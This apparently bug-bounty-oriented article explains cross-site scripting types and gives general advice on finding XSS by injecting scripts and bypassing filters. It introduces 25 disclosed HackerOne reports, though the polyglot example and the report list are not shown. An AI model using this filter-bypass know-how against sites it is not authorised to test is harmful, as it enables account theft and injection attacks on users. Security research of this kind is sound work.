In this article, we will discuss Cross-Site Scripting (XSS) vulnerability, how to find one and present 25 disclosed reports based on this issue.
What is XSS?
Types of XSS
- Stored/Persistent XSS: malicious scripts are stored in the application, for example in a comment section.
- Reflected/Non-persistent XSS: malicious scripts are returned back to the user, for example in a search query.
- DOM-Based/Client-Side XSS: malicious scripts are injected in the Document Object Model, being executed on the client-side and the webserver response isn’t modified.
- Self-XSS: the victim is tricked to run malicious scripts on their side, for example in their web developer console.
How to find XSS in a bug bounty program
First, identify all the user inputs in the application, then play with them. Send malicious scripts inside the input, see how the server responds, try to bypass the restrictions such as tag removal, encoding or character blacklisting.
Also, inject some XSS polyglots like this:
I will provide some links that contain lists with payloads like the one above.
Top 25 XSS Bug Bounty Reports
The reports were disclosed through the HackerOne platform and were selected according to their upvotes, bounty, severity level, complexity, and uniqueness.